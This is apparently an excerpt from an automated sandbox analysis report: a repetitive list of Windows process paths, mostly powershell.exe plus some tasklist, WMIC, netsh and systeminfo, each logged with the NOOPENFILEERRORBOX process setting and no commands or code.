              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\systeminfo.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
